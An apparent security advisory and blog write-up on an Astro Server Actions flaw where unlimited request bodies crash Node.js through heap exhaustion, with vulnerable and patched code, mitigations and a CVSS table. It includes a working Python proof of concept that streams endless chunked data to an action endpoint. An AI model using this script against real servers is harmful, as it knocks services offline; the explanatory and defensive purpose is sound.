Feb 26, 2026 · 5 min read
Astro versions 9.0.0 to 9.5.3 accept unlimited request body sizes for Server Actions. An attacker can send a large payload (e.g., 500MB) to any action endpoint, causing the Node.js process to run out of memory (OOM) and crash. This leads to persistent downtime, especially in containerized environments where the service enters a crash-restart loop.
A fundamental oversight in how the Astro web framework handles Server Actions created a trivial Denial of Service vector. By failing to enforce a maximum request body size, Astro allowed unauthenticated attackers to feed unlimited data into the Node.js runtime, triggering a heap allocation failure and crashing the application process. This vulnerability specifically affects the `astro` and `@astrojs/node` packages in standalone mode.
Modern full-stack frameworks love 'Server Actions'. It's the shiny new paradigm where you write a function in your backend code, export it, and the framework magically wires up the RPC layer. It feels like magic. But magic often requires a suspension of disbelief—or in this case, a suspension of security best practices.
In Astro, Server Actions are designed to handle form submissions and data mutations. When you click that 'Subscribe' button, Astro serializes the form data, sends a POST request, and processes it on the server. Ideally, this process is swift, validated, and strictly bounded.
However, prior to version 9.5.4, Astro forgot one of the golden rules of internet plumbing: never trust the client's capacity to shut up. The framework implicitly trusted that the incoming request body would be reasonable in size. It didn't ask "How much data are you sending?" It just opened its mouth and swallowed whatever the client fed it.
The vulnerability resides in the `parseRequestBody` function within Astro's runtime. When a request hits a Server Action endpoint, the framework needs to parse the payload to make it accessible to your code. In the Node.js adapter, this was implemented using standard Fetch API methods like `request.json()` or `request.formData()`.
Here is the problem: in a Node.js environment, these convenience methods attempt to buffer the entire request body into memory before parsing it. Unlike a streaming parser that processes data chunk-by-chunk, `request.json()` waits for the whole payload to arrive.
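The buffering-versus-streaming distinction is easy to model outside of Node. A minimal Python sketch (the function names are mine, not Astro's) shows why the streaming approach can reject an oversized payload early while the buffering approach cannot:

```python
def parse_buffered(chunks):
    """Toy model of request.json(): hold the whole body before doing anything."""
    body = b"".join(chunks)  # memory use scales with total payload size
    return body              # ...and only then would parsing begin


def parse_streaming(chunks, limit):
    """Toy model of a streaming parser: inspect each chunk, bail out early."""
    received = 0
    parts = []
    for chunk in chunks:
        received += len(chunk)
        if received > limit:  # bounded memory: abort before buffering it all
            raise ValueError("payload too large")
        parts.append(chunk)
    return b"".join(parts)
```

With a 1KB limit, a 10KB stream is rejected after the second chunk arrives; the buffered version has no choice but to materialize all 10KB first.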
Node.js runs on the V8 engine, which has a default heap size limit (often around 1.5GB to 2GB, depending on the version and flags). If an attacker sends a payload larger than the available heap space—say, a 2GB stream of the letter 'A'—V8 attempts to allocate memory for the string, fails, and throws a fatal error: `FATAL ERROR: JavaScript heap out of memory`.
Because this happens deep inside the framework's request handling logic—before your user-land validation code even runs—you cannot catch this error with a try/catch block in your action. The process simply dies.
Let's look at the smoking gun. In the vulnerable versions, the code looked something like this (simplified for dramatic effect):

```ts
// The "Trusting" Implementation
export async function parseRequestBody(request: Request) {
  const contentType = request.headers.get('Content-Type');
  if (contentType === 'application/json') {
    // VULNERABLE: buffers the entire body onto the heap
    return await request.json();
  }
  // ... formData handling
}
```

The fix, introduced in commit 522f880b07a4ea7d69a19b5507fb53a5ed6c87f8, is a masterclass in defensiveness. The developers realized they couldn't rely on the high-level `json()` method anymore. They had to get their hands dirty with streams.
Here is the corrected logic using a manual reader:

```ts
// The "Paranoid" Implementation (Fix)
const DEFAULT_ACTION_BODY_SIZE_LIMIT = 1024 * 1024; // 1MB

async function readRequestBodyWithLimit(request: Request, limit: number) {
  const reader = request.body.getReader();
  let received = 0;
  const chunks = [];
  while (true) {
    const { done, value } = await reader.read();
    if (done) break;
    received += value.byteLength;
    // THE GUARD RAIL
    if (received > limit) {
      throw new ActionError({
        code: 'CONTENT_TOO_LARGE',
        message: `Request body exceeds ${limit} bytes`
      });
    }
    chunks.push(value);
  }
  // ... reconstruct and parse
}
```

This new implementation checks the Content-Length header first (the polite check), but also manually counts bytes as they stream in (the "I don't trust you" check). If the counter ticks past 1MB, it severs the connection immediately.
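That two-layer pattern—trust the declared length, then verify the actual bytes—translates into a short Python sketch. This is my own illustration of the technique, not Astro's code; the names `read_body_with_limit` and `ContentTooLarge` are invented for clarity:

```python
class ContentTooLarge(Exception):
    """Raised when a request body exceeds the configured size limit."""


def read_body_with_limit(headers, chunks, limit=1024 * 1024):
    # Polite check: reject requests whose declared size is already too big.
    declared = headers.get("content-length")
    if declared is not None and int(declared) > limit:
        raise ContentTooLarge("Content-Length exceeds limit")
    # Distrustful check: count actual bytes as they arrive, because the
    # header can lie (or be absent with Transfer-Encoding: chunked).
    received = 0
    parts = []
    for chunk in chunks:
        received += len(chunk)
        if received > limit:
            raise ContentTooLarge(f"body exceeds {limit} bytes")
        parts.append(chunk)
    return b"".join(parts)
```

A client that declares a 50-byte body but streams in two megabytes is still cut off mid-stream by the byte counter.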
Exploiting this is trivially easy. You don't need shellcode, you don't need ROP chains, and you don't need authentication. You just need curl or a simple Python script.
Action endpoints live at predictable URLs of the form `/_actions/someActionName`. Here is a Python PoC that uses chunked encoding to bypass any frontend proxies that might filter by the Content-Length header alone (though the vulnerability is in the buffering itself):
```python
import requests

def generate_trash():
    # Generate an endless stream of garbage
    while True:
        yield b'A' * 1024  # 1KB chunks

url = "http://target-astro-site.com/_actions/login"
headers = {
    "Content-Type": "application/json",
    "Transfer-Encoding": "chunked"
}

try:
    # Send a never-ending stream until the server dies
    response = requests.post(url, data=generate_trash(), headers=headers, stream=True)
except requests.exceptions.ConnectionError:
    print("Target down! Connection severed.")
```

When this runs against a vulnerable Astro server, the Node.js process attempts to construct a string from the incoming chunks. Once the buffer hits the V8 heap limit (~1.5GB), the process crashes hard. In a Kubernetes cluster, the pod will restart, the attacker hits it again, and you enter CrashLoopBackOff.
The immediate fix is to upgrade to Astro v9.5.4 or higher. This version applies a hard 1MB cap on request bodies for server actions.
If you cannot upgrade immediately, you must enforce limits at the infrastructure layer:
- At the reverse proxy (e.g. Nginx), cap request sizes with `client_max_body_size`.
- At the WAF/CDN, restrict or rate-limit large POST requests to `/_actions/*` paths.

This vulnerability highlights a critical difference between "Serverless/Edge" environments and long-lived Node.js processes. In Edge environments (like Cloudflare Workers), the runtime often enforces strict limits on request bodies automatically. In a standalone Node.js server, you are the runtime. You are responsible for every byte that enters memory. Never assume the framework defaults are safe for production without verifying resource limits.
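As a concrete illustration of the proxy-layer cap, a minimal Nginx sketch might look like the following. The 1MB value mirrors Astro's fixed default, but the upstream port and exact paths are assumptions you would adapt to your deployment:

```nginx
# Cap request bodies for Astro action endpoints only (illustrative values)
location /_actions/ {
    client_max_body_size 1m;            # Nginx answers 413 beyond this
    proxy_pass http://127.0.0.1:4321;   # assumed Astro standalone port
}
```

This stops the oversized payload at the edge, so the Node.js process never has to buffer it at all.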
CVSS Vector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| `astro` (withastro) | >= 9.0.0, < 9.5.4 | 9.5.4 |
| `@astrojs/node` (withastro) | >= 9.0.0, < 9.5.4 | 9.5.4 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-770 |
| CWE Name | Allocation of Resources Without Limits or Throttling |
| Attack Vector | Network |
| CVSS Score | 5.9 (Medium) |
| Impact | Denial of Service (DoS) |
| EPSS Score | 0.0007 |